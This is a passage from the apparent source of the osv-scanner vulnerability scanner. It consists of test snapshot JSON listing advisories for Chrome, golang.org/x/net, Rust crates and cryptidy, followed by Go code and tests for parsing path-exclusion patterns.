"type": "ECOSYSTEM" } ] } ], "details": "Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Low)", "id": "CVE-2024-3847", "modified": "2024-05-03T03:16:29Z", "published": "2024-04-17T08:15:10Z", "references": [ { "type": "ARTICLE", "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_16.html" }, { "type": "WEB", "url": "https://issues.chromium.org/issues/328690293" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CWIVXXSVO5VB3NAZVFJ7CWVBN6W2735T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IDLUD644WEWGOFKMZWC2K7Z4CQOKQYR7/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4PCXKCOVBUUU6GOSN46DCPI4HMER3PJ/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PCWPUBGTBNT4EW32YNZMRIPB3Y4R6XL6/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOC3HLIZCGMIJLJ6LME5UWUUIFLXEGRN/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEP5NJUWMDRLDQUKU4LFDUHF5PCYAPIO/" } ] } ] } ] }, { "source": { "path": "testdata/filter/some/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" }, "ecosystem_specific": { "urgency": "unimportant" }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41723" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" }, "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "schema_version": "1.4.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ], "urgency": "low" }, "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ], "schema_version": "1.4.0" } ] } ] }, { "source": { "path": "testdata/filter/some/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" }, "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ], "type": "SEMVER" } ] } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" }, "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "schema_version": "1.4.0", "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code" } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" }, "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "schema_version": "1.4.0", "summary": "Segmentation fault in time" }, { "affected": [ { "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ], "schema_version": "1.4.0", "summary": "Potential segfault in the time crate" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- ================================================ FILE: pkg/osvscanner/__snapshots__/osvscanner_test.snap ================================================ [TestDoScan/Test_curl_git_scanning - 1] { "results": [ { "source": { "path": "", "type": "unknown" }, "packages": [ { "package": { "name": "", "version": "", "ecosystem": "", "commit": "33dffa3909a67e1b5d22647128ab7eb6e53fd0c7" }, "groups": [ { "ids": [ "CVE-2025-63675" ], "aliases": [ "CVE-2025-63675", "GHSA-97w9-v595-3h5q" ], "max_severity": "8.8" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2025-63675.json" }, "ranges": [ { "database_specific": { "versions": [ { "introduced": "0" }, { "last_affected": "1.2.4" } ] }, "events": [ { "introduced": "0" }, { "last_affected": "33dffa3909a67e1b5d22647128ab7eb6e53fd0c7" } ], "repo": "https://github.com/netinvent/cryptidy", "type": "GIT" } ], "versions": [ "v1.0.4", "v1.0.5", "v1.0.7", "v1.1.0", "v1.2.0", "v1.2.1", "v1.2.2", "v1.2.3", "v1.2.4" ] } ], "aliases": [ "GHSA-97w9-v595-3h5q" ], "details": "cryptidy through 1.2.4 allows code execution via untrusted data because pickle.loads is used. This occurs in aes_decrypt_message in symmetric_encryption.py.", "id": "CVE-2025-63675", "modified": "2026-03-14T12:45:39.021698Z", "published": "2025-10-31T07:15:38.283Z", "references": [ { "type": "WEB", "url": "https://github.com/netinvent/cryptidy/blob/cebc9ffd54cc20679d15a1a43ca9a5da645b0c58/cryptidy/symmetric_encryption.py#L220-L238" }, { "type": "EVIDENCE", "url": "https://github.com/javiermorales36/cryptidy-analysis" } ], "schema_version": "1.7.5", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "type": "CVSS_V3" } ] } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- ================================================ FILE: pkg/osvscanner/__snapshots__/vulnerability_result_internal_test.snap ================================================ [Test_assembleResult/group_vulnerabilities - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [Test_assembleResult/group_vulnerabilities_with_all_packages_included - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] }, { "package": { "name": "pkg-2", "version": "1.0.0", "ecosystem": "npm" } } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [Test_assembleResult/group_vulnerabilities_with_license_allowlist - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "licenses": [ "MIT", "0BSD" ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "licenses": [ "UNKNOWN" ], "license_violations": [ "UNKNOWN" ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "MIT", "0BSD" ] } } } --- [Test_assembleResult/group_vulnerabilities_with_license_allowlist_and_all_packages - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "licenses": [ "MIT", "0BSD" ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] }, { "package": { "name": "pkg-2", "version": "1.0.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "licenses": [ "UNKNOWN" ], "license_violations": [ "UNKNOWN" ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "MIT", "0BSD" ] } } } --- [Test_assembleResult/group_vulnerabilities_with_license_allowlist_and_license_override - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "licenses": [ "MIT", "0BSD" ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "licenses": [ "MIT" ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": [ "MIT", "0BSD" ] } } } --- [Test_assembleResult/group_vulnerabilities_with_licenses - 1] { "results": [ { "source": { "path": "dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-1", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "CVE-123", "GHSA-123" ], "aliases": [ "CVE-123", "GHSA-123" ], "max_severity": "" } ], "licenses": [ "MIT", "0BSD" ], "vulnerabilities": [ { "id": "CVE-123" }, { "aliases": [ "CVE-123" ], "id": "GHSA-123" } ] }, { "package": { "name": "pkg-2", "version": "1.0.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] } ] }, { "source": { "path": "other-dir/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "pkg-3", "version": "1.0.0", "ecosystem": "npm" }, "groups": [ { "ids": [ "GHSA-456" ], "aliases": [ "GHSA-456" ], "max_severity": "" } ], "licenses": [ "UNKNOWN" ], "vulnerabilities": [ { "id": "GHSA-456" } ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [] } } } --- ================================================ FILE: pkg/osvscanner/exclude.go ================================================ package osvscanner import ( "fmt" "path/filepath" "regexp" "runtime" "strings" "github.com/gobwas/glob" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) // excludePatterns holds parsed patterns for excluding paths during scanning. // Supports three types of patterns: // - dirsToSkip: exact directory names to skip // - globPattern: glob patterns (g:pattern syntax) // - regexPattern: regex patterns (r:pattern syntax) type excludePatterns struct { dirsToSkip []string // Exact directory names to skip globPattern glob.Glob // Combined glob pattern using {p1,p2,...} syntax regexPattern *regexp.Regexp // Combined regex pattern using (p1|p2|...) syntax } // parseExcludePatterns parses the exclude patterns from command line. // Pattern syntax (matching --lockfile flag style): // - "dirname" or ":dirname" -> exact directory name (dirsToSkip) // - "g:pattern" -> glob pattern (globPattern) // - "r:pattern" -> regex pattern (regexPattern) // // The ":" prefix is an escape hatch for directory names containing colons. func parseExcludePatterns(patterns []string) (*excludePatterns, error) { var dirsToSkip []string var globPatterns []string var regexPatterns []string for _, p := range patterns { patternType, pattern := parseExcludeArg(p) switch patternType { case "": // Exact directory name dirsToSkip = append(dirsToSkip, pattern) case "g": globPatterns = append(globPatterns, pattern) case "r": regexPatterns = append(regexPatterns, pattern) default: return nil, fmt.Errorf("unknown pattern type %q in %q; use g: for glob or r: for regex", patternType, p) } } result := &excludePatterns{ dirsToSkip: dirsToSkip, } // Compile glob patterns using {p1,p2,...} syntax if len(globPatterns) > 0 { var combined string if len(globPatterns) == 1 { combined = globPatterns[0] } else { combined = "{" + strings.Join(globPatterns, ",") + "}" } g, err := glob.Compile(combined, '/') if err != nil { return nil, fmt.Errorf("invalid glob pattern %q: %w", combined, err) } result.globPattern = g } // Compile regex patterns using (p1|p2|...) syntax if len(regexPatterns) > 0 { var combined string if len(regexPatterns) == 1 { combined = regexPatterns[0] } else { combined = "(" + strings.Join(regexPatterns, "|") + ")" } r, err := cachedregexp.Compile(combined) if err != nil { return nil, fmt.Errorf("invalid regex pattern %q: %w", combined, err) } result.regexPattern = r } return result, nil } // parseExcludeArg parses a single exclude argument. // Returns (patternType, pattern) where: // - patternType is "" for exact match, "g" for glob, "r" for regex, or the unknown prefix // - pattern is the actual pattern to use // // Unknown prefixes are returned as-is so the caller can provide appropriate error messages. func parseExcludeArg(arg string) (string, string) { // Handle Windows absolute paths (e.g., C:\path) if runtime.GOOS == "windows" { if strings.HasPrefix(arg, "r:") || strings.HasPrefix(arg, "g:") { cmdlogger.Warnf("interpreting as regex/glob and not absolute path: %s", arg) } else if filepath.IsAbs(arg) { return "", arg } } patternType, pattern, found := strings.Cut(arg, ":") if !found { // No colon found, treat as exact directory name return "", arg } // Empty prefix means exact match (escape hatch for paths with colons) // "g" prefix means glob pattern // "r" prefix means regex pattern // Return all prefixes (including unknown ones) to let the caller handle validation return patternType, pattern } ================================================ FILE: pkg/osvscanner/exclude_test.go ================================================ package osvscanner import ( "testing" ) func Test_parseExcludeArg(t *testing.T) { t.Parallel() tests := []struct { name string arg string wantPatternType string wantPattern string }{ {"exact_directory_name", "test", "", "test"}, {"exact_with_colon_escape", ":test", "", "test"}, {"glob_pattern", "g:**/test/**", "g", "**/test/**"}, {"regex_pattern", "r:\\.git", "r", "\\.git"}, {"regex_with_pipe", "r:node_modules|vendor", "r", "node_modules|vendor"}, {"empty_string", "", "", ""}, {"directory_with_colon_escape", ":my:project", "", "my:project"}, {"single_letter_dir", "g", "", "g"}, {"path_like_glob", "test/path", "", "test/path"}, {"unknown_prefix_returns_prefix", "x:pattern", "x", "pattern"}, // Windows specific tests - these will run on Linux too but result might depend on OS // We expect r: to be regex on ALL platforms now with the fix (since it falls through on Linux, and matches explicit check on Windows) {"windows_regex_lower_r", `r:pattern`, "r", "pattern"}, {"windows_glob_lower_g", `g:pattern`, "g", "pattern"}, {"windows_regex_simple", `r:foo`, "r", "foo"}, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() patternType, pattern := parseExcludeArg(tt.arg) if patternType != tt.wantPatternType { t.Errorf("parseExcludeArg(%q) patternType = %q, want %q", tt.arg, patternType, tt.wantPatternType) } if pattern != tt.wantPattern { t.Errorf("parseExcludeArg(%q) pattern = %q, want %q", tt.arg, pattern, tt.wantPattern) } }) } } func Test_parseExcludePatterns(t *testing.T) { t.Parallel() tests := []struct { name string patterns []string wantErr bool dirsCount int globTestPath string regexTestPath string }{ { name: "single_exact_directory", patterns: []string{"test"}, dirsCount: 1, }, { name: "multiple_exact_directories", patterns: []string{"test", "docs", "vendor"}, dirsCount: 3, }, { name: "single_glob_pattern", patterns: []string{"g:**/test/**"}, globTestPath: "foo/test/bar", }, { name: "single_regex_pattern", patterns: []string{"r:\\.git"}, regexTestPath: ".git", }, { name: "mixed_patterns", patterns: []string{"vendor", "g:**/test/**", "r:node_modules"}, dirsCount: 1, globTestPath: "foo/test/bar", regexTestPath: "node_modules", }, { name: "multiple_glob_patterns", patterns: []string{"g:**/test/**", "g:**/docs/**"}, globTestPath: "foo/docs/readme", }, { name: "multiple_regex_patterns", patterns: []string{"r:\\.git", "r:\\.cache"}, regexTestPath: ".cache", }, { name: "empty_patterns", patterns: []string{}, }, { name: "invalid_glob", patterns: []string{"g:["}, wantErr: true, }, { name: "invalid_regex", patterns: []string{"r:[invalid"}, wantErr: true, }, { name: "colon_escape_for_exact_match", patterns: []string{":my:project"}, dirsCount: 1, }, { name: "unknown_prefix_returns_error", patterns: []string{"x:pattern"}, wantErr: true, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() result, err := parseExcludePatterns(tt.patterns) if (err != nil) != tt.wantErr { t.Errorf("parseExcludePatterns() error = %v, wantErr %v", err, tt.wantErr) return } if tt.wantErr { return } // Check dirs count if len(result.dirsToSkip) != tt.dirsCount { t.Errorf("parseExcludePatterns() dirsToSkip count = %d, want %d", len(result.dirsToSkip), tt.dirsCount) } // Check glob pattern presence and matching wantGlob := tt.globTestPath != "" if (result.globPattern != nil) != wantGlob { t.Errorf("parseExcludePatterns() globPattern present = %v, want %v", result.globPattern != nil, wantGlob) } if wantGlob && result.globPattern != nil { if !result.globPattern.Match(tt.globTestPath) { t.Errorf("globPattern.Match(%q) = false, want true", tt.globTestPath) } } // Check regex pattern presence and matching wantRegex := tt.regexTestPath != "" if (result.regexPattern != nil) != wantRegex { t.Errorf("parseExcludePatterns() regexPattern present = %v, want %v", result.regexPattern != nil, wantRegex) } if wantRegex && result.regexPattern != nil { if !result.regexPattern.MatchString(tt.regexTestPath) { t.Errorf("regexPattern.MatchString(%q) = false, want true", tt.regexTestPath) } } }) } } ================================================ FILE: pkg/osvscanner/filter.go ================================================ // Package osvscanner provides the main logic for the OSV-Scanner. package osvscanner import ( "fmt" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/config" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/google/osv-scanner/v2/internal/imodels/results" "github.com/google/osv-scanner/v2/pkg/models" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/ossf/osv-schema/bindings/go/osvschema" ) // filterUnscannablePackages removes packages that don't have enough information to be scanned or // are not a supported ecosystem, and returns the list of removed packages (if --all-packages flag is passed in) // e,g, local packages that specified by path func filterUnscannablePackages(scanResults *results.ScanResults, actions ScannerActions) []*extractor.Package { packageResults := make([]*extractor.Package, 0, len(scanResults.PackageScanResults)) filteredPsr := make([]*extractor.Package, 0, len(scanResults.PackageScanResults)) for _, psr := range scanResults.PackageScanResults { switch { // If **none** of the cases match, skip this package since it's not scannable case !imodels.Ecosystem(psr).IsEmpty() && imodels.Name(psr) != "" && imodels.Version(psr) != "": case imodels.Commit(psr) != "": default: if actions.ShowAllPackages { filteredPsr = append(filteredPsr, psr) } continue } switch { // If **any** of the following cases are true, skip this package case imodels.Ecosystem(psr).Ecosystem == osvconstants.EcosystemMaven && imodels.Name(psr) == 